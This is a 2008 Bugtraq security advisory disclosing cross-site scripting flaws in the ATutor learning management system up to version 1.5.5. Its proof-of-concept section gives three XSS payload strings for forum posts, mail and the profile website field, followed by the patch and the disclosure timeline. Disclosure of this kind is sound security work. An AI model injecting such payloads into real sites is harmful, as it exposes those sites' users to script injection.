ATutor <= 1.5.5 Cross Site Scripting
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: ATutor <= 1.5.5 Cross Site Scripting
- From: L4teral <l4teral@xxxxxxxxx>
- Date: Mon, 18 Feb 2008 00:01:07 +0100
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; bh=xMzhimqul1EIolRvkDCtFbyql4i/JZ7dShpbJYA4ILc=; b=dugTvAirqcwcKlZJU/KcczNoSCv1EiHKz4xHN0sbuHgjmapCM1M+tOFxgDGVnKT/yQMFU41qiVhf2TjAhQrUqO5NS69QtJuVa1JZLBcTkEDf8ZyG0QoOgLOyXW/ONrG6qil2cTcEGVl5qNUfN39H7ldvjKK8jaOqEo0IG9wBnxw=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=qd0bsmi9cOK0VklgbJ2KOv3ma8lwJKMEpq+zKfisvycob4ds7z6TJvPAvOMndw4jS6uEr4xLHhIOewI7MT3MJ7NrP/PAqyzRbwu0hhO3KpKzKI+oZBRgDa2AZVuA5SoWpFJdzyQVDUEYTR/lBYJxNMT4KcATS9OMcriHLTaqqGs=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
======================================================================
ATutor <= 1.5.5 Cross Site Scripting
======================================================================
Author: L4teral <l4teral [4t] gmail com>
Impact: Cross Site Scripting
Status: patch available
------------------------------
Affected software description:
------------------------------
Application: ATutor
Version: <= 1.5.5
Vendor: http://www.atutor.ca
Description:
ATutor is an Open Source Web-based Learning Content Management System
(LCMS) designed with accessibility and adaptability in mind.
Administrators can install or update ATutor in minutes, develop custom
templates to give ATutor a new look, and easily extend its
functionality with feature modules. Educators can quickly assemble,
package, and redistribute Web-based instructional content, easily
retrieve and import prepackaged content, and conduct their courses
online. Students learn in an adaptive learning environment.
--------------
Vulnerability:
--------------
The mail and forum components are vulnerable to cross site scripting.
Script code can be embedded into the user profile.
------------
PoC/Exploit:
------------
create forum post/mail with:
http://www.ex"style="width:expression(alert('xss'))"ample.com (IE only)
create forum post/mail with:
http://www.ex"onmouseover="javascript:alert('xss');"ample.com
use the following as website in the profile:
http://"></a><script>alert('xss')</script>
---------
Solution:
---------
update to version 1.6 or above.
---------
Timeline:
---------
2007-10-17 - vendor informed
2007-10-18 - vendor responded
2008-02-05 - vendor released new version
2008-02-17 - public disclosure